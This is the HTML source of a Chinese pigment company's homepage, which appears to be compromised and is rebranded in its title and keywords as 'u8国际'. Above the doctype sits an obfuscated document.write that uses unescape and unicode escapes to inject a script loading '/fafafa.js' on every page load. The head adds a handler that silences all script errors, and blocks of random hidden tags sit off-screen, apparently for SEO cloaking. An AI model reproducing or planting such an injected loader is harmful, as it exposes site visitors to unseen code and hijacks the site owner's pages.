<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script><!DOCTYPE html>
<html>

<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
<title>u8国际-追求健康,你我一起成长</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.great-fortune.net/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.great-fortune.net/">
<link href="http://m.great-fortune.net/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="keywords" content="u8国际">
<meta name="description" content="u8国际（www.great-fortune.net）全称是福建u8国际材料科技股份有限公司于1990年成立，具有完善的研发、品保、应用等中心，使用全自动及人工智能＋工业互联网实施全流程的无人化工艺。">
<link rel="stylesheet" href="/template/cn/css/reset.css">
<link rel="stylesheet" href="/template/cn/js/slick/slick.css">
<link rel="stylesheet" href="/template/cn/css/whir_css.css">
<script src="/template/cn/js/jquery-3.3.1.min.js"></script>
<script src="/template/cn/js/jquery.countup.min.js"></script>
<script src="/template/cn/js/jquery.waypoints.min.js"></script>
<script src="/template/cn/js/slick/slick.min.js"></script>
<script src="/template/cn/js/a.whir.search.js"></script>
<!-- <script src="https://static.bshare.cn/b/buttonLite.js#style=-1&amp;uuid=&amp;pophcol=1&amp;lang=zh"></script> -->
<!-- <script src="https://static.bshare.cn/b/bshareC0.js"></script> -->
    <script type="text/javascript">
        var m = '';
        var nav = '';
    </script>
</head>

<body class="index-page">

<div id='body_jx_440819' style='position:fixed; left:-9000px; top:-9000px;'><obxu class='kvaany'><lrj id='kvaany'></lrj></obxu><jhex class='utghfn'><bkxu id='utghfn'></bkxu></jhex><we class='xbhbzr'><bdo id='xbhbzr'></bdo></we><lof class='ohrahr'><kh id='ohrahr'></kh></lof><qohq class='clnkqo'><hrcyfh id='clnkqo'></hrcyfh></qohq><br class='atyifp'><amigz id='atyifp'></amigz></br><qrfi class='bahuxz'><nho id='bahuxz'></nho></qrfi><riaw class='zgjkeh'><jyyjb id='zgjkeh'></jyyjb></riaw><bthzv class='dsykog'><ae id='dsykog'></ae></bthzv><zptgr class='kzivpa'><fde id='kzivpa'></fde></zptgr><oly class='qpuluj'><pwkjeo id='qpuluj'></pwkjeo></oly><yklc class='ebbubo'><uzr id='ebbubo'></uzr></yklc><fkt class='ccjxpe'><zpdl id='ccjxpe'></zpdl></fkt><qt class='grewje'><gmilt id='grewje'></gmilt></qt><cop class='pwjedh'><jamt id='pwjedh'></jamt></cop><bhgce class='bljnmv'><odk id='bljnmv'></odk></bhgce><jilt class='mincxd'><zb id='mincxd'></zb></jilt><qdmlo class='hnhowe'><uzpobj id='hnhowe'></uzpobj></qdmlo><zue class='oyyndu'><nmiji id='oyyndu'></nmiji></zue><jlggq class='nhlwkp'><re id='nhlwkp'></re></jlggq><lono class='ygkxzx'><uaa id='ygkxzx'></uaa></lono><vp class='qylzcm'><rjtkr id='qylzcm'></rjtkr></vp><kt class='ogerho'><ighc id='ogerho'></ighc></kt><irtzq class='vxxkmu'><sttd id='vxxkmu'></sttd></irtzq><ftihi class='szynpg'><lcemxh id='szynpg'></lcemxh></ftihi><na class='vowkal'><wwwk id='vowkal'></wwwk></na><kss class='xgpbjm'><gtgydb id='xgpbjm'></gtgydb></kss><sc class='wkbdug'><fftq id='wkbdug'></fftq></sc><avmju class='xotlro'><jb id='xotlro'></jb></avmju><an class='mczcib'><vlj id='mczcib'></vlj></an><uib class='geoacf'><lcmc id='geoacf'></lcmc></uib><shk class='ngusmn'><uxtk id='ngusmn'></uxtk></shk><oe class='jmcpgf'><tsyedh id='jmcpgf'></tsyedh></oe><xa class='tdfflr'><uoixi id='tdfflr'></uoixi></xa><dnt class='qdfamp'><tefqii id='qdfamp'></tefqii></dnt><nzqn class='uwuayf'><iazh id='uwuayf'></iazh></nzqn><kpigj class='rfzaic'><yweqg id='rfzaic'></yweqg></kpigj><iow class='xjlyrf'><zh id='xjlyrf'></zh></iow><wfpfj class='uideag'><bg id='uideag'></bg></wfpfj><xkh class='eirkxf'><dn id='eirkxf'></dn></xkh><igzk class='tcqyjf'><wzl id='tcqyjf'></wzl></igzk><wzqww class='ydynao'><ghv id='ydynao'></ghv></wzqww><wix class='nibrmv'><vry id='nibrmv'></vry></wix><ysqw class='dzcnlx'><ihf id='dzcnlx'></ihf></ysqw><vpn class='kdprwq'><hv id='kdprwq'></hv></vpn><qe class='xyyuen'><pznztk id='xyyuen'></pznztk></qe><det class='tyfztx'><yuez id='tyfztx'></yuez></det><gbyeq class='yihygf'><pxfw id='yihygf'></pxfw></gbyeq><hramg class='npvrjv'><mxqwz id='npvrjv'></mxqwz></hramg><nvfk class='builzi'><ddnxd id='builzi'></ddnxd></nvfk></div>

<div id='body_jx_95862' style='position:fixed; left:-9000px; top:-9000px;'><pi class='lrzxop'><ph id='lrzxop'></ph></pi><tvdkj class='rnjjky'><zff id='rnjjky'></zff></tvdkj><jm class='hmipux'><zybidg id='hmipux'></zybidg></jm><fr class='dumoor'><ziryh id='dumoor'></ziryh></fr><jk class='cqkeac'><zh id='cqkeac'></zh></jk><qbrbn class='vfzugs'><te id='vfzugs'></te></qbrbn><ejkzq class='epyaaw'><wofafl id='epyaaw'></wofafl></ejkzq><xm class='mnfigy'><vhpaf id='mnfigy'></vhpaf></xm><eeh class='ekdovu'><wedw id='ekdovu'></wedw></eeh><enj class='umwxwb'><pzc id='umwxwb'></pzc></enj><htof class='mvljhe'><qqvjpf id='mvljhe'></qqvjpf></htof><vh class='rkytli'><nv id='rkytli'></nv></vh><ptdp class='bnuony'><diglzm id='bnuony'></diglzm></ptdp><ugj class='rbqcnr'><bx id='rbqcnr'></bx></ugj><jywwg class='zaymuh'><jkz id='zaymuh'></jkz></jywwg><lx class='bcpdud'><yvyi id='bcpdud'></yvyi></lx><czx class='hfktgq'><suwz id='hfktgq'></suwz></czx><yif class='nzrdms'><byewn id='nzrdms'></byewn></yif><tmg class='ccyqkk'><ew id='ccyqkk'></ew></tmg><siiqh class='rtrehp'><wpour id='rtrehp'></wpour></siiqh><qwf class='tsfpcc'><yzd id='tsfpcc'></yzd></qwf><mx class='jqkczd'><wz id='jqkczd'></wz></mx><ozb class='xiadby'><rxje id='xiadby'></rxje></ozb><kpa class='qidvua'><nc id='qidvua'></nc></kpa><mkgay class='geayxh'><vpqfsd id='geayxh'></vpqfsd></mkgay><kxzj class='xdamuw'><ag id='xdamuw'></ag></kxzj><gn class='llazvt'><xdcn id='llazvt'></xdcn></gn><vhfj class='qsauba'><nvdymz id='qsauba'></nvdymz></vhfj><zoi class='ojjhpi'><smm id='ojjhpi'></smm></zoi><sg class='vqeuuf'><vc id='vqeuuf'></vc></sg><cy class='rfixlb'><fljb id='rfixlb'></fljb></cy><nngm class='zwzkkp'><ufs id='zwzkkp'></ufs></nngm><yfw class='leottp'><nzbtzw id='leottp'></nzbtzw></yfw><quwf class='upmack'><nlqxje id='upmack'></nlqxje></quwf><bkd class='lnehdn'><nr id='lnehdn'></nr></bkd><jngtr class='cuxfbn'><skq id='cuxfbn'></skq></jngtr><fpc class='zvhuaz'><eksa id='zvhuaz'></eksa></fpc><zwy class='utxgwc'><rgx id='utxgwc'></rgx></zwy><dfz class='pabbvv'><iv id='pabbvv'></iv></dfz><ri class='pkwujo'><kgofo id='pkwujo'></kgofo></ri><qodn class='rfeasx'><udtzn id='rfeasx'></udtzn></qodn><ztm class='hchlsj'><qslo id='hchlsj'></qslo></ztm><gs class='vbdiop'><fshve id='vbdiop'></fshve></gs><qsacy class='dwemqp'><tnllko id='dwemqp'></tnllko></qsacy><bexn class='snphnh'><srskdv id='snphnh'></srskdv></bexn><gndga class='zaqhfb'><axl id='zaqhfb'></axl></gndga><qvas class='uypucb'><olblkw id='uypucb'></olblkw></qvas><tfy class='zwrohf'><icltfo id='zwrohf'></icltfo></tfy><kzcr class='xmuqev'><wc id='xmuqev'></wc></kzcr><akslu class='mrlmeo'><dbbgeb id='mrlmeo'></dbbgeb></akslu></div>

<div id='body_jx_46491910' style='position:fixed; left:-9000px; top:-9000px;'><nn class='qffpqg'><mo id='qffpqg'></mo></nn><tsapj class='itezqg'><fhsh id='itezqg'></fhsh></tsapj><puzcc class='hlgtxu'><jzec id='hlgtxu'></jzec></puzcc><hmiog class='mkrgrl'><bckce id='mkrgrl'></bckce></hmiog><jzfoo class='azeqoe'><xf id='azeqoe'></xf></jzfoo><fg class='whkgcd'><yv id='whkgcd'></yv></fg><fddws class='ioankc'><yyk id='ioankc'></yyk></fddws><wa class='kyjirr'><kfzjo id='kyjirr'></kfzjo></wa><ndo class='codrbi'><ugd id='codrbi'></ugd></ndo><shpj class='nsduka'><wcc id='nsduka'></wcc></shpj><vd class='taglzi'><mg id='taglzi'></mg></vd><om class='eblonb'><lfxnxl id='eblonb'></lfxnxl></om><zizr class='ebkwse'><hs id='ebkwse'></hs></zizr><ay class='brdleh'><xwaot id='brdleh'></xwaot></ay><appwh class='peqiru'><clqw id='peqiru'></clqw></appwh><xziy class='qwljsu'><ftd id='qwljsu'></ftd></xziy><ki class='rwxlmv'><pl id='rwxlmv'></pl></ki><aa class='otcgte'><etkz id='otcgte'></etkz></aa><dvf class='bnlfcv'><tkwn id='bnlfcv'></tkwn></dvf><gpp class='tmffim'><znyjnw id='tmffim'></znyjnw></gpp><erqw class='ymcxbp'><unmnbe id='ymcxbp'></unmnbe></erqw><zmif class='ykoqsk'><fgtch id='ykoqsk'></fgtch></zmif><ni class='lyjimj'><khh id='lyjimj'></khh></ni><pi class='lyfzeo'><dnrfsm id='lyfzeo'></dnrfsm></pi><nzim class='vgrbjf'><vrxldn id='vgrbjf'></vrxldn></nzim><mbrl class='qwymxu'><svwj id='qwymxu'></svwj></mbrl><jq class='jjcbga'><qv id='jjcbga'></qv></jq><wky class='zddmgq'><kv id='zddmgq'></kv></wky><yxbui class='yxypia'><hpl id='yxypia'></hpl></yxbui><qw class='xvnkti'><hnrcy id='xvnkti'></hnrcy></qw><ivkaz class='lxrjva'><rqt id='lxrjva'></rqt></ivkaz><at class='gjzcrw'><fmi id='gjzcrw'></fmi></at><qcn class='tmubqo'><gz id='tmubqo'></gz></qcn><pk class='etefvd'><jv id='etefvd'></jv></pk><ybvj class='zvucpa'><cjsy id='zvucpa'></cjsy></ybvj><dx class='izmyfm'><fl id='izmyfm'></fl></dx><jgv class='hwbwlx'><thepi id='hwbwlx'></thepi></jgv><pd class='rzrxlv'><axf id='rzrxlv'></axf></pd><zhu class='hmkrzn'><axks id='hmkrzn'></axks></zhu><xvn class='xwqese'><svwwdp id='xwqese'></svwwdp></xvn><vyabi class='syimlr'><xquhy id='syimlr'></xquhy></vyabi><cwiqd class='akuiul'><xnpqmj id='akuiul'></xnpqmj></cwiqd><qcpu class='trfoud'><dj id='trfoud'></dj></qcpu><gzarp class='nziinh'><nxq id='nziinh'></nxq></gzarp><ozbb class='saqosq'><tlmby id='saqosq'></tlmby></ozbb><wwhx class='thespg'><krh id='thespg'></krh></wwhx><fi class='kgwiwv'><lib id='kgwiwv'></lib></fi><ebixj class='dcylan'><ak id='dcylan'></ak></ebixj><zdwba class='tkypqr'><hjc id='tkypqr'></hjc></zdwba><fziug class='gnsgdz'><dt id='gnsgdz'></dt></fziug></div>

<div id='body_jx_93093956' style='position:fixed; left:-9000px; top:-9000px;'><tsgh class='qvddtr'><vydzle id='qvddtr'></vydzle></tsgh><sm class='geofrj'><ppr id='geofrj'></ppr></sm><dr class='bqzhwv'><bj id='bqzhwv'></bj></dr><fg class='uouvhh'><rf id='uouvhh'></rf></fg><tvy class='kacaqk'><jyes id='kacaqk'></jyes></tvy><gvg class='wydnxi'><avodrz id='wydnxi'></avodrz></gvg><acjdn class='kvjdyt'><sonv id='kvjdyt'></sonv></acjdn><tm class='xmqpqp'><kqfzz id='xmqpqp'></kqfzz></tm><dtqn class='cffnit'><ek id='cffnit'></ek></dtqn><ef class='hphbtc'><fu id='hphbtc'></fu></ef><ryhp class='wwqkvj'><dgv id='wwqkvj'></dgv></ryhp><mwymb class='dyfbcl'><avka id='dyfbcl'></avka></mwymb><ghy class='rgcxlc'><uk id='rgcxlc'></uk></ghy><vrlh class='iyvymg'><wqybzn id='iyvymg'></wqybzn></vrlh><zjh class='toeouq'><abrhj id='toeouq'></abrhj></zjh><loozd class='enfehs'><fb id='enfehs'></fb></loozd><ftvwl class='kbrbmx'><bdejgj id='kbrbmx'></bdejgj></ftvwl><ucngn class='qdbonp'><gb id='qdbonp'></gb></ucngn><ctte class='gldnni'><sqnsq id='gldnni'></sqnsq></ctte><uqc class='pgnwbd'><cpt id='pgnwbd'></cpt></uqc><gndnt class='ayfoit'><tf id='ayfoit'></tf></gndnt><mphk class='tevqsf'><qkcwxu id='tevqsf'></qkcwxu></mphk><vebph class='ksorgz'><msbdj id='ksorgz'></msbdj></vebph><cbo class='pdtghb'><ip id='pdtghb'></ip></cbo><fy class='widhwt'><aaa id='widhwt'></aaa></fy><rwss class='iyzrqy'><onxayr id='iyzrqy'></onxayr></rwss><kt class='jxootr'><iac id='jxootr'></iac></kt><inzac class='eorhjw'><uxrdsv id='eorhjw'></uxrdsv></inzac><wdlzs class='ihtdfb'><hrr id='ihtdfb'></hrr></wdlzs><zu class='lccjuj'><bvaxi id='lccjuj'></bvaxi></zu><sidvq class='jobaep'><tsobh id='jobaep'></tsobh></sidvq><obi class='kjrzjd'><gqfahc id='kjrzjd'></gqfahc></obi><errj class='sakhjd'><mjgsmf id='sakhjd'></mjgsmf></errj><anp class='ojtjda'><rv id='ojtjda'></rv></anp><rumh class='zwlwqg'><ilpjkg id='zwlwqg'></ilpjkg></rumh><gdxjo class='qmlsga'><rrlybs id='qmlsga'></rrlybs></gdxjo><rjisa class='szewud'><akd id='szewud'></akd></rjisa><adyo class='mmdota'><kht id='mmdota'></kht></adyo><bih class='kmvzut'><cwscrl id='kmvzut'></cwscrl></bih><xchev class='lzbdds'><xqush id='lzbdds'></xqush></xchev><oz class='lxokwn'><jfqtfb id='lxokwn'></jfqtfb></oz><fdo class='dgvihe'><mjnl id='dgvihe'></mjnl></fdo><bocn class='duzqfy'><psdo id='duzqfy'></psdo></bocn><bsw class='vszuci'><sxwg id='vszuci'></sxwg></bsw><fjcg class='gtgtxx'><tnum id='gtgtxx'></tnum></fjcg><xx class='ixdjyj'><va id='ixdjyj'></va></xx><rqlo class='nmidpp'><rtbf id='nmidpp'></rtbf></rqlo><mc class='lzfjvb'><fyecb id='lzfjvb'></fyecb></mc><hreq class='eduxid'><qvst id='eduxid'></qvst></hreq><tnc class='ybgouz'><jd id='ybgouz'></jd></tnc></div>

<div id='body_jx_715790' style='position:fixed; left:-9000px; top:-9000px;'><evpok class='vgcton'><pfmib id='vgcton'></pfmib></evpok><tarso class='qqldix'><qk id='qqldix'></qk></tarso><xfw class='hfrnlg'><gj id='hfrnlg'></gj></xfw><larfg class='jdxmrj'><ku id='jdxmrj'></ku></larfg><ug class='avavym'><gbxfc id='avavym'></gbxfc></ug><vnnkm class='srthux'><abi id='srthux'></abi></vnnkm><kcuc class='mterzl'><bowzke id='mterzl'></bowzke></kcuc><bahuu class='eqfegx'><yqq id='eqfegx'></yqq></bahuu><zrwn class='xdfmms'><spf id='xdfmms'></spf></zrwn><bbzkl class='jubrhl'><nhv id='jubrhl'></nhv></bbzkl><vorp class='osgaei'><qdm id='osgaei'></qdm></vorp><amlm class='tkpcyr'><abqrzo id='tkpcyr'></abqrzo></amlm><yy class='hndjag'><wvdyma id='hndjag'></wvdyma></yy><buxi class='wrmepe'><rt id='wrmepe'></rt></buxi><nl class='xqtpjh'><qdpcfc id='xqtpjh'></qdpcfc></nl><yevpi class='afzafv'><kvfef id='afzafv'></kvfef></yevpi><tdx class='nclpva'><npg id='nclpva'></npg></tdx><rdff class='oaahye'><lhtqz id='oaahye'></lhtqz></rdff><pgp class='yflgfl'><yh id='yflgfl'></yh></pgp><qa class='akiujr'><qepfhf id='akiujr'></qepfhf></qa><cv class='tycssa'><ibao id='tycssa'></ibao></cv><encxu class='ygagtp'><zpc id='ygagtp'></zpc></encxu><bz class='mqbsgi'><rwih id='mqbsgi'></rwih></bz><zfg class='ytjyiz'><siqx id='ytjyiz'></siqx></zfg><osd class='xyfcwr'><zljcrx id='xyfcwr'></zljcrx></osd><rptd class='yfqaqe'><ctxfvy id='yfqaqe'></ctxfvy></rptd><nmvmr class='cxnrwx'><gyhp id='cxnrwx'></gyhp></nmvmr><aa class='mhgntc'><htnqza id='mhgntc'></htnqza></aa><vb class='qqfzco'><kp id='qqfzco'></kp></vb><fou class='xitujn'><bev id='xitujn'></bev></fou><whbmo class='ffgwii'><ll id='ffgwii'></ll></whbmo><nnd class='orxphc'><ohqh id='orxphc'></ohqh></nnd><mk class='xbvmlx'><cbayeb id='xbvmlx'></cbayeb></mk><vypj class='oluhrk'><bii id='oluhrk'></bii></vypj><bp class='diijbz'><tmt id='diijbz'></tmt></bp><pgib class='rvpzjr'><qzfe id='rvpzjr'></qzfe></pgib><pkbb class='aazewt'><gsepq id='aazewt'></gsepq></pkbb><vram class='rrqhpt'><jj id='rrqhpt'></jj></vram><asnnu class='qzekgc'><bgeci id='qzekgc'></bgeci></asnnu><ag class='fhivju'><taovgy id='fhivju'></taovgy></ag><petx class='jximwz'><uswvy id='jximwz'></uswvy></petx><obg class='okrmrj'><tc id='okrmrj'></tc></obg><ih class='rpdsjz'><pbxnf id='rpdsjz'></pbxnf></ih><hucot class='dzxgro'><ie id='dzxgro'></ie></hucot><we class='tqkvxr'><tgm id='tqkvxr'></tgm></we><mh class='cvroes'><hwonc id='cvroes'></hwonc></mh><bqg class='lcsqki'><uu id='lcsqki'></uu></bqg><vefc class='yqcler'><bt id='yqcler'></bt></vefc><abzi class='ncakcp'><fctri id='ncakcp'></fctri></abzi><bfuu class='fvwqau'><uw id='fvwqau'></uw></bfuu></div>
    <div id="2zx086" class="header-wrapper">
        <div id="24wd96" class="header">
    <div id="m120j1" class="auto1720 clearfix">
        <a href="/" class="logo">
            <img src="/uploads/uploadfiles/images/logo.png" alt="">
        </a>
        <nav class="nav-view">
            <div id="sh4pf6" class="nav-view-box">
                <i class="close" id="navClose"></i>
                <ul class="navlist clearfix" id="headerNav">
                    
                    <li class="navitem" id="m1">
                        <em><a href="/gywm/" class="first">关于u8国际</a></em>
                        
                        <div id="dnqwf8" class="subnav-view">
                            
                            
                            <div id="azdrrk" class="subnav">
                                
                                <a href="/gywm/qyjj/">企业简介</a>
                                
                                <a href="/gywm/fzlc/">发展历程</a>
                                
                                <a href="/gywm/qywh/">企业文化</a>
                                
                                <a href="/gywm/dsczc/">董事长致辞</a>
                                
                                <a href="/gywm/ryzz/">荣誉资质</a>
                                
                                <a href="/gywm/zzjg/">组织架构</a>
                                
                                VR全景
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m7">
                        <em><a href="/yfcx/" class="first">研发创新</a></em>
                        
                        <div id="atjgmk" class="subnav-view">
                            
                            
                            <div id="p2x05k" class="subnav">
                                
                                <a href="/yfcx/yfzx/">研发中心</a>
                                
                                <a href="/yfcx/xjsb/">先进设备</a>
                                
                                <a href="/yfcx/pbzx/">品保中心</a>
                                
                                <a href="/yfcx/zlcg/">专利成果</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m12">
                        <em><a href="/xwzx/" class="first">新闻中心</a></em>
                        
                        <div id="b961a3" class="subnav-view">
                            
                            
                            <div id="n9qh2l" class="subnav">
                                
                                <a href="/xwzx/gsxw/">公司新闻</a>
                                
                                <a href="/xwzx/xydt/">行业动态</a>
                                
                                <a href="/xwzx/zhzx/">展会资讯</a>
                                
                                <a href="/xwzx/cpxw/">新品发布</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m16">
                        <em><a href="/cpzx/" class="first">产品中心</a></em>
                        
                        <div id="dqh1k0" class="subnav-view">
                            
                            <div id="1xkahw" class="subnav">
                                
                                <dl data-pros='1'>
                                    <dt><a href="/cpzx/zgxgyl/">珠光效果颜料</a></dt>
                                </dl>
                                
                                <dl data-pros='2'>
                                    <dt><a href="/cpzx/gnddsml/">高浓度颜料预分散体</a></dt>
                                </dl>
                                
                                <dl data-pros='3'>
                                    <dt><a href="/cpzx/eyht/">钛白粉</a></dt>
                                </dl>
                                
                                <dl data-pros='4'>
                                    <dt><a href="/cpzx/yht/">氧化铁</a></dt>
                                </dl>
                                
                                <dl data-pros='5'>
                                    <dt><a href="/cpzx/me/">默尔</a></dt>
                                </dl>
                                
                            </div>
                            <div id="t02eqh" class="series">
                                
                                <div id="wf2a75" class="series-list clearfix" data-apps="1">
                                    
                                </div>
                                
                                <div id="zaxbc9" class="series-list clearfix" data-apps="2">
                                    
                                </div>
                                
                                <div id="h9w09j" class="series-list clearfix" data-apps="3">
                                    
                                </div>
                                
                                <div id="8l7sgh" class="series-list clearfix" data-apps="4">
                                    
                                </div>
                                
                            </div>
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m22">
                        <em><a href="/shzr/" class="first">社会责任</a></em>
                        
                        <div id="8zrtj4" class="subnav-view">
                            
                            
                            <div id="w2pf77" class="subnav">
                                
                                <a href="/shzr/qyxwzz/">u8国际的承诺</a>
                                
                                <a href="/shzr/xmcg/">项目成果</a>
                                
                                <a href="/shzr/CSRshbg/">CSR审核报告</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m28">
                        <em><a href="/wmdfw/" class="first">服务平台</a></em>
                        
                        <div id="kszjsf" class="subnav-view">
                            
                            
                            <div id="mp9q28" class="subnav">
                                
                                <a href="/wmdfw/sclxqsbg/">色彩流行趋势报告</a>
                                
                                <a href="/wmdfw/dzhcxz/">电子画册下载</a>
                                
                                <a href="/wmdfw/bgxz/">报告下载</a>
                                
                                <a href="/wmdfw/zhengtailink/">正太化学交易平台</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m31">
                        <em><a href="/lxwm/" class="first">联系u8国际</a></em>
                        
                        <div id="5xwty7" class="subnav-view">
                            
                            
                            <div id="62fhc7" class="subnav">
                                
                                <a href="/lxwm/lxfs/">联系方式</a>
                                
                                <a href="/lxwm/qqyw/">全球业务</a>
                                
                                <a href="/lxwm/zxns/">招贤纳士</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m100">
                        <em><a href="/lzzl/" class="first">廉政专栏</a></em>
                        
                        <div id="gwk7kb" class="subnav-view">
                            
                            
                            <div id="2tsc8a" class="subnav">
                                
                                <a href="/lzzl/lzgy/">廉政公约</a>
                                
                                <a href="/lzzl/sdglhx/">十大管理红线</a>
                                
                                <a href="/lzzl/jbxz/">举报须知</a>
                                
                                <a href="/lzzl/jbglzd/">举报管理制度</a>
                                
                                <a href="/lzzl/lzglzd/">廉政管理制度</a>
                                
                                <a href="/lzzl/pxzj/">培训总结</a>
                                
                                <a href="/lzzl/kzxbg/">可持续报告</a>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
                    <li class="navitem" id="m35">
                        <em><a href="/tzzgx/" class="first">投资者关系</a></em>
                        
                        <div id="e9j66r" class="subnav-view">
                            
                            
                            <div id="m98wlp" class="subnav">
                                
                                公司公告
                                
                                互动交流
                                
                            </div>
                            <div id="8ye93l" class="info clearfix">
                                
                                <div id="56yjhx" class="item">
                                    <div id="g8d7zh" class="image"><img src="/uploads/uploadfiles/images/pic15_1.jpg"></div>
                                    <dl>
                                        <dt>董事会秘书 黄蓝菲女士</dt>
                                        <dd>联系邮箱：huanglanfei@great-fortune.net</dd>
                                        <dd>办公电话：0591-85588083</dd>
                                    </dl>
                                </div>
                                
                                <div id="3ggy52" class="item">
                                    <div id="menm20" class="image"><img src="/uploads/uploadfiles/images/pic15_2.jpg"></div>
                                    <dl>
                                        <dt>证券事务代表 林英女士</dt>
                                        <dd>联系邮箱：linying@great-fortune.net</dd>
                                        <dd>办公电话：0591-85588083</dd>
                                    </dl>
                                </div>
                                
                            </div>
                            
                            
                        </div>
                        
                    </li>
                    
					<li class="buy navitem"><img src="/template/cn/images/buy.gif" alt="" height=80px /></li>
                </ul>
                <div id="pke45t" class="mobile-controller">
                    <div id="adzknz" class="search-box">
                        <input type="text" placeholder="搜索">
                        <i class="icon-search"></i>
                    </div>
                    <a href="#" class="wx"></a>
                    <a href="#" class="in"></a>
                    <a href="https://www.kuncai-pigments.com" class="language"></a>
                </div>
            </div>
            <div id="ah0xdb" class="mask"></div>
        </nav>
        <div class="controller" id="pcController">
            <ul class="clearfix">
                <!--<li>
                    <div id="rl1ynt" class="bshare-custom">
                        <a title="分享到微信" class="bshare-weixin"></a>
                        <a title="分享到LinkedIn" class="bshare-linkedin"></a>
                    </div>
                </li>-->
                <li class="language">
                    <a href="/?p=/Do/area&lg=en" class="icon">EN</a>
                </li>
                <li class="search-wrap">
                    <div id="js486z" class="search-box">
                        <input type="text" id="TopKey" value="" placeholder="搜索">
                        <i class="icon-search" id="TopBtn"></i>
                    </div>
                </li>
            </ul>
            <div class="menu" id="headerMenu">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript">
    $(function () {
        $('#headerMenu').click(function () {
            $('.header .nav-view').show();
            $('.header .nav-view .mask').show();
            $('.header .nav-view .nav-view-box').animate({
                right: '0'
            });
            $('body').css('overflow', 'hidden');
        });
        $('#navClose').click(function () {
            $('.header .nav-view .nav-view-box').animate({
                right: '-100%'
            }, function () {
                $('.header .nav-view .mask').hide();
                $('.header .nav-view').hide();
            });

            $('body').css('overflow', 'visible');
        });

        $('#m1 .subnav-view .subnav:last a:last,#m28 .subnav-view .subnav:last a:last').attr("target", "_blank")

        if ($(window).width() < 992) {
            $('#headerNav .navitem em').click(function () {
                $(this).next('.subnav-view').stop().slideToggle();
                $(this).parent().siblings().find('.subnav-view').stop().slideUp();
            });
            //产品二级
            $('#headerNav .navitem dl dt').click(function () {
                $(this).next('dd').stop().slideToggle();
                $(this).parent().siblings().find('dd').stop().slideUp();
            });
        } else {
            $('#headerNav .navitem').hover(function () {
                $(this).find('.subnav-view').stop().slideDown();
            }, function () {
                $(this).find('.subnav-view').stop().slideUp();
            });
            //产品二级
            $('#headerNav .subnav dl').hover(function () {
                $(this).find('dd').stop().slideDown();
            }, function () {
                $(this).find('dd').stop().slideUp();
            });
        }

        $('#m16 .series .series-list').eq(0).show();

        $('#m16 .subnav dl').hover(function () {
            var pros = $(this).data('pros');
            $('#m16 .series .series-list').hide();
            $('#m16 .series .series-list').each(function (index, item) {
                var apps = $(this).data('apps');
                if (apps === pros) {
                    $(this).show();

                    if ($(this).find('div').length) {
                        console.log(1)
                        $('#m16 .series').show();
                    } else {
                        console.log(2)
                        $('#m16 .series').hide();
                    }
                }


            });
        }, function () { });

        $('.counter').countUp({
            time: 600
        });
        //搜索
        $("#TopBtn").jqSearch({
            TxtVal: "搜索",
            KeyTxt1: "输入关键词搜索！",
            KeyTxt2: "输入的关键词字数不要过多！",
            KeyTxt3: "您输入的内容存在特殊字符！",
            KeyId: "TopKey", //输入框id
            KeyUrl: "/search/", //跳转链接
            Keyhref: "keyword", //链接传值
            Static: false //是否静态站
        });
    });
</script>
    </div>
    <div class="index-banner" id="banner">
        
        <div id="6er3ms" class="item">
            <img src="/static/upload/image/20240912/1726102914748740.jpg">
        </div>
        
        <div id="edsmgj" class="item">
            <img src="/static/upload/image/20230512/1683854900150428.jpg">
        </div>
        
        <div id="d15tfx" class="item">
            <img src="/static/upload/image/20250909/1757385316619367.png">
        </div>
        
        <div id="l0e09h" class="item">
            <img src="/static/upload/image/20250804/1754287028528112.jpg">
        </div>
        
    </div>
    <!-- 集团实力 -->
    <div id="g9a3re" class="index-se1">
        <div id="h28phf" class="auto1720">
            
            <ul class="clearfix">
                <li class="item first">
                    <div id="t74adl" class="box">
                        <div>
                            <span class="title-en">Group strength</span>
                            <span class="title-cn">集团实力</span>
                        </div>
                    </div>
                </li>
                
                <li class="item">
                    <div id="efsp9t" class="box">
                        <div>
                            <span>总占地面积</span>
                            <span class="number"><em class="font-avanti counter">2000</em>亩</span>
                        </div>
                    </div>
                </li>
                
                <li class="item">
                    <div id="bqfq7q" class="box">
                        <div>
                            <span>年产二氧化钛</span>
                            <span class="number"><em class="font-avanti counter">50万</em>吨</span>
                        </div>
                    </div>
                </li>
                
                <li class="item">
                    <div id="ctlxt0" class="box">
                        <div>
                            <span>年产氧化铁</span>
                            <span class="number"><em class="font-avanti counter">50万</em>吨</span>
                        </div>
                    </div>
                </li>
                
                <li class="item">
                    <div id="yf1tcq" class="box">
                        <div>
                            <span>年产珠光材料</span>
                            <span class="number"><em class="font-avanti counter">3万</em>吨</span>
                        </div>
                    </div>
                </li>
                
            </ul>
            
        </div>
    </div>
    <!-- 集团简介 -->
    <div id="b70b8r" class="index-se2">
        <div id="m19gbm" class="auto1720">
            
            <div class="image" id="videoPaly">
                
                <img src="/static/upload/image/20240514/1715654103223944.jpg">
                
                <div id="0twtg5" class="play"></div>
            </div>
            <div id="4d43y9" class="content">
                <div id="rr04k1" class="title-view">
